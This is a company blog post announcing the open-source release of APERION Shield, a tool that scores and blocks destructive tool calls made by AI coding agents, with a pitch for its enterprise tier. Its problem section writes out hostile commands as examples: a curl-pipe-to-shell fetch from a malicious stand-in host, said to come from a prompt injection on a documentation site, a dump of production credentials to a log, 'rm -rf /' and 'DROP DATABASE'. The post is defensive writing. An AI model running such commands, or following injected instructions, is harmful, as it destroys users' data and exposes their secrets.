Why We Open-Sourced Shield

On May 13, 2026, we released APERION Shield as Apache 2.0 open source.

Shield is a 6 MB Rust binary that wraps any MCP server and blocks destructive AI agent operations before they execute. Five-signal adaptive scoring. Forty-five starter rules across twelve categories. Single brew install on macOS. Single download on Linux. No telemetry. No account.

The repository: github.com/AperionAI/shield.

The license: Apache 2.0. Same engine ships in our enterprise product, SmartFlow Shield. We took the runtime control layer that already existed in the enterprise edition and made the developer-tier version free, permanent, and unrestricted.

This post explains why.

The problem

AI coding agents inside Cursor, Claude Code, GitHub Copilot Agent, and similar tools now have tool-use capabilities. The agent does not just suggest code. It executes commands.

The execution path looks like this. Developer prompts the agent for a feature change. Agent reasons about the task, decides what tools it needs, and invokes them. The tool might be a database query. It might be a filesystem operation. It might be a git command. It might be a curl call to an external API. It might be a shell command in the developer’s local environment.

In most setups, the developer does not see the tool call before it executes. Some tools auto-approve. Some tools require confirmation, but the confirmation UI is designed to be fast, not careful. By the time the developer notices an unintended action, the action has happened.

Common commands that look reasonable in context, and that we have seen agents produce in production:

DROP DATABASE production_users;

The agent thought it was generating a fresh migration. It found the existing production database, decided it needed a clean slate, and dropped it before running the new schema.

rm -rf /

The agent thought it was cleaning up a temporary directory. It resolved the path relative to root because of a string interpolation bug in the prompt. It ran the command before the developer reviewed the prompt.

git push --force origin main

The agent thought it was reconciling a rebase. The remote had two commits the agent didn’t know about. Force push lost them.

curl https://malicious.example.com/install.sh | sh

The agent thought it was following installation instructions from a tool’s documentation. The instructions were generated by a prompt injection on a documentation site the agent crawled.

cat .env.production >> /tmp/agent_log.txt

The agent thought it was diagnosing a configuration issue. It dumped production credentials to a log file an attacker can read.

These are not hypothetical. They are happening now in real development environments. The PocketOS incident in May 2026 was one public example where an autonomous coding agent took destructive action that the founder discovered only after the fact in the system logs.

Why static rules do not work

The naive solution is a denylist. Match the command. If the command contains DROP DATABASE or rm -rf, block it.

Static rules fail in three ways.

They false-positive on legitimate operations. DROP DATABASE in a development environment is fine. rm -rf in a Docker container that is about to be destroyed is fine. git push --force on a personal branch is fine. A denylist that blocks all instances of these patterns blocks too much, and developers turn it off within a day.

They false-negative on novel forms. An attacker who knows about the denylist generates command variants that achieve the same destructive outcome through different syntax. DELETE FROM users WHERE 1=1 destroys the same data as DROP TABLE users, even though the empty table remains. A denylist that matches DROP does not match DELETE.

They cannot evaluate context. The command itself is not the unit of risk. The combination of the command, the environment where it runs, the target it operates against, and the operational history of recent commands is the unit of risk. Static rules cannot see context.
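The first two failure modes are easy to reproduce. The sketch below is a deliberately naive denylist, not Shield's rule engine; the pattern list and the function name `denylist_blocks` are assumptions made for illustration.

```rust
/// Illustrative patterns only; this is not Shield's starter rule set.
const DENYLIST: [&str; 3] = ["drop database", "rm -rf", "push --force"];

/// Naive static rule: block any command that contains a listed substring.
/// It sees only the command text, never the environment or the target.
fn denylist_blocks(command: &str) -> bool {
    let lowered = command.to_lowercase();
    DENYLIST.iter().any(|pattern| lowered.contains(pattern))
}
```

With these patterns, `denylist_blocks("DROP DATABASE scratch_dev;")` returns true even though the target is a development database, and `denylist_blocks("DELETE FROM users WHERE 1=1;")` returns false even though the statement empties the table.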

How Shield actually works

Shield evaluates every tool call against five signals. The signals combine into a severity score. The score determines whether the call proceeds, blocks, or escalates for human approval.
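As a rough mental model, the flow from signals to decision could look like the sketch below. Everything in it is an assumption made for illustration: the `Signals` and `Decision` types, the additive combination, the 0 to 100 scale, and the thresholds of 50 and 80 are not taken from Shield's source. Only the scoring inputs appear here, because the safer-alternative suggestion is produced once a call is blocked.

```rust
/// The three outcomes described above.
#[derive(Debug, PartialEq)]
enum Decision {
    Allow,
    Escalate, // ask a human for approval
    Block,
}

/// Hypothetical per-call inputs, all on an integer 0..=100 scale.
struct Signals {
    pattern_base: i32,   // base score from the static pattern match
    context_adjust: i32, // positive for production-looking targets, negative for dev/test
    memory_adjust: i32,  // negative when the user has approved this operation before
    burst_adjust: i32,   // positive when destructive calls arrive in a burst
}

/// Combine the inputs into one severity score. A plain clamped sum is the
/// simplest possible choice; the real engine may weight signals differently.
fn severity(signals: &Signals) -> i32 {
    let raw = signals.pattern_base
        + signals.context_adjust
        + signals.memory_adjust
        + signals.burst_adjust;
    raw.clamp(0, 100)
}

/// Map the score to a decision using illustrative thresholds.
fn decide(score: i32) -> Decision {
    if score >= 80 {
        Decision::Block
    } else if score >= 50 {
        Decision::Escalate
    } else {
        Decision::Allow
    }
}
```

The point of the sketch is that the pattern match contributes a starting value, and the other inputs can move the same command into any of the three outcomes.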

Signal 1: command pattern matching. This is the static layer. Destructive patterns get a base score. The base score is one input to the final decision, not the decision itself.

Signal 2: workspace context probe. Shield inspects the working directory, the environment variables, the git branch, and the file system before scoring the call. A DROP DATABASE call against a database named *_prod or *_production gets escalated. A DROP DATABASE call against *_test or *_dev does not. Same command. Different score. Because the context tells Shield this is production.
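The database-name part of that probe can be sketched in a few lines. The suffixes come from the paragraph above; the `Environment` type, the function names, and the adjustment values are hypothetical, and a real probe would also look at the working directory, environment variables, and git branch.

```rust
/// What the target's name suggests about where the command would run.
#[derive(Debug, PartialEq)]
enum Environment {
    Production,
    NonProduction,
    Unknown,
}

/// Classify a database by name suffix, case-insensitively.
fn classify_database(name: &str) -> Environment {
    let lowered = name.to_lowercase();
    if lowered.ends_with("_prod") || lowered.ends_with("_production") {
        Environment::Production
    } else if lowered.ends_with("_test") || lowered.ends_with("_dev") {
        Environment::NonProduction
    } else {
        Environment::Unknown
    }
}

/// Hypothetical score adjustment: raise the score for production targets,
/// lower it for dev/test targets, leave it unchanged when nothing is known.
fn context_adjustment(env: &Environment) -> i32 {
    match env {
        Environment::Production => 30,
        Environment::NonProduction => -40,
        Environment::Unknown => 0,
    }
}
```

A name that matches neither set of suffixes is treated as unknown rather than safe, so the static base score stands on its own in that case.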

Signal 3: local decision memory. Shield remembers what the user has previously approved. If the user approved git push --force origin main twice this week against the same branch, the third invocation gets a lower score because the user has demonstrated they understand and accept the operation. If the user has never approved a similar action, the score is higher.
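A minimal sketch of that idea, assuming an in-memory map keyed by operation and target. The `DecisionMemory` type, its methods, and the adjustment values are hypothetical, and the sketch leaves out the time window ("this week") and any on-disk persistence.

```rust
use std::collections::HashMap;

/// Counts prior user approvals per (operation, target) pair.
struct DecisionMemory {
    approvals: HashMap<(String, String), u32>,
}

impl DecisionMemory {
    fn new() -> Self {
        DecisionMemory { approvals: HashMap::new() }
    }

    /// Record that the user approved `operation` against `target`.
    fn record_approval(&mut self, operation: &str, target: &str) {
        let key = (operation.to_string(), target.to_string());
        *self.approvals.entry(key).or_insert(0) += 1;
    }

    /// Score adjustment: a small penalty for never-approved operations,
    /// a discount of 5 per prior approval, capped at 4 approvals (-20).
    fn adjustment(&self, operation: &str, target: &str) -> i32 {
        let key = (operation.to_string(), target.to_string());
        let count = self.approvals.get(&key).copied().unwrap_or(0);
        match count {
            0 => 10,
            n => -(5 * n.min(4) as i32),
        }
    }
}
```

The cap matters in this sketch: without it, enough approvals would push any operation to a score of zero, and the memory would become a permanent allowlist.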

Signal 4: burst detector. Shield tracks the rate of destructive operations. Five destructive operations in five minutes is a different signal than one destructive operation a day. The burst pattern often indicates an agent in an exception loop, retrying the same destructive action with variations until something works. Shield blocks the burst before the loop completes.
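One common way to track such a rate is a sliding window over event timestamps. The sketch below takes that approach; the `BurstDetector` type and its parameters are assumptions, and timestamps are passed in as plain seconds so the behavior is easy to follow.

```rust
use std::collections::VecDeque;

/// Sliding-window counter for destructive operations.
struct BurstDetector {
    window_secs: u64,
    threshold: usize,
    events: VecDeque<u64>, // timestamps in seconds, oldest first
}

impl BurstDetector {
    fn new(window_secs: u64, threshold: usize) -> Self {
        BurstDetector { window_secs, threshold, events: VecDeque::new() }
    }

    /// Record a destructive operation at `now_secs`. Returns true when the
    /// number of operations inside the window reaches the threshold.
    fn record(&mut self, now_secs: u64) -> bool {
        // Drop events that have aged out of the window.
        while let Some(&oldest) = self.events.front() {
            if now_secs.saturating_sub(oldest) >= self.window_secs {
                self.events.pop_front();
            } else {
                break;
            }
        }
        self.events.push_back(now_secs);
        self.events.len() >= self.threshold
    }
}
```

With `BurstDetector::new(300, 5)`, calls at 0, 60, 120, and 180 seconds return false and a fifth call at 240 seconds returns true. Two calls a day apart never trip the detector.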

Signal 5: safer alternative suggestion. When Shield blocks an operation, it does not just block. It suggests what the agent could do instead. DROP DATABASE production gets blocked with a suggestion to use a versioned migration tool. rm -rf gets blocked with a suggestion to use a temporary directory and cleanup hook. git push --force gets blocked with a suggestion to use git push --force-with-lease, which refuses to overwrite remote commits the local branch doesn’t know about.
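The three suggestions above can be sketched as a simple lookup. The function name `safer_alternative`, the substring matching, and the message wording are assumptions for illustration; how Shield actually attaches suggestions to rules is not described here.

```rust
/// Return a suggested replacement for a blocked command, if one is known.
fn safer_alternative(command: &str) -> Option<&'static str> {
    let lowered = command.to_lowercase();
    if lowered.contains("push")
        && lowered.contains("--force")
        && !lowered.contains("--force-with-lease")
    {
        Some("use `git push --force-with-lease` so unseen remote commits are not overwritten")
    } else if lowered.contains("drop database") {
        Some("apply the change through a versioned migration tool")
    } else if lowered.contains("rm -rf") {
        Some("work in a temporary directory and remove it with a cleanup hook")
    } else {
        None
    }
}
```

Returning the suggestion alongside the block gives the agent a concrete next step, which makes it less likely to retry the same destructive command with small variations.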

The combination of these five signals produces a false-positive rate that is manageable on real developer workflows. Static-rule guardrails fail this test in the first hour. Adaptive scoring lets the tool actually stay enabled long enough to be useful.

Why we made it free

Shield is the same engine as SmartFlow Shield, our enterprise product. The enterprise tier adds team-wide policy management, id.me biometric step-up for high-severity operations, identity-bound audit, and integration with the broader SmartFlow runtime governance stack. The single-developer Shield runs locally with no cloud dependency.

Three reasons we open-sourced the developer tier.

The supply chain argument. Software supply chains are broken. The March 2026 LiteLLM incident proved it. 95 million monthly Python downloads. Thirty-six percent of cloud environments. One supply chain compromise. The entire package quarantined on PyPI within hours. Every enterprise running LiteLLM in production scrambled to verify whether their secrets had been exfiltrated.

A guardrail that protects developers from this category of attack should not be paywalled. A paywalled guardrail does not run on the laptops where the attack happens. Shield wraps the MCP server, blocks the destructive operation, and runs locally with no network dependency. If it were a paid product, fewer developers would run it. If fewer developers run it, the next supply chain attack damages more enterprises.

The talent argument. The next generation of senior engineers will encounter AI coding agents as a default development environment in their first jobs. The mental model they form about how to govern those agents will shape enterprise procurement decisions for the next decade. If the mental model they form is “guardrails are an enterprise product I cannot afford,” they will deploy without guardrails. If the mental model they form is “guardrails are a free, default-on, single-binary install,” they will deploy with them.

We would rather subsidize the right default than monetize the broken one.

The market education argument. Most enterprise CISOs do not yet understand that AI coding agents now have shell access on developer laptops. The conversation that produces understanding starts with developers showing their security teams what Shield blocks. The faster developers can run Shield and produce that evidence, the faster the CISO conversation happens. The faster the CISO conversation happens, the faster the enterprise procurement cycle starts for SmartFlow Shield.

Open source as market education is a known pattern. We chose to use it.

What Shield does not do

Shield does not detect prompt injection inside the agent’s reasoning step. The agent’s reasoning happens in the model, not in Shield’s tool call layer. Prompt injection defense is a SmartFlow capability at Layer 3 of the Trust Fabric. Shield handles the tool call boundary; SmartFlow handles the model call boundary.

Shield does not enforce data loss prevention on file content. If the agent reads a file that contains PII and includes the PII in a tool call, Shield evaluates the tool call. It does not classify the data. DLP classification is a SmartFlow capability.

Shield does not provide identity-bound audit. The free Shield logs its decisions on the developer’s machine. The enterprise tier ties decisions to verified identity via id.me and produces tamper-evident audit logs. The free Shield is for the developer; the audit is for the enterprise.

These are not gaps. They are the right scope split between a free developer tool and an enterprise product.

Get started

Install:

brew install aperion-ai/tap/shield

Run as MCP proxy:

shield wrap --upstream postgres://localhost

Or embed as a Rust crate:

cargo add aperion-shield

Repository, issues, contribution guide:

github.com/AperionAI/shield

Apache 2.0. No account. No telemetry. No cloud dependency. Forty-five starter rules across twelve categories: SQL, git, filesystem, secrets, supply chain, cloud, Kubernetes, Docker, LLM planning, anomaly, identity, network.

We will keep shipping improvements. Issue tracker open. PR contributions welcome. Bi-weekly minor version cadence.


Technical companion: APERION Shield documentation. Full rule reference, configuration patterns, integration with Cursor and Claude Code, embeddable Rust crate API.

Enterprise tier: SmartFlow Shield. Team policy management, identity-bound audit, id.me biometric step-up, fleet manager.

Where Shield fits in the Trust Fabric architecture: Trust Fabric page. Layer 3 developer tier.

Craig Alberino
Craig Alberino is the CEO and Founder of LangSmart, which provides Smartflow — the enterprise AI gateway, firewall, and control plane for Fortune 500 companies.
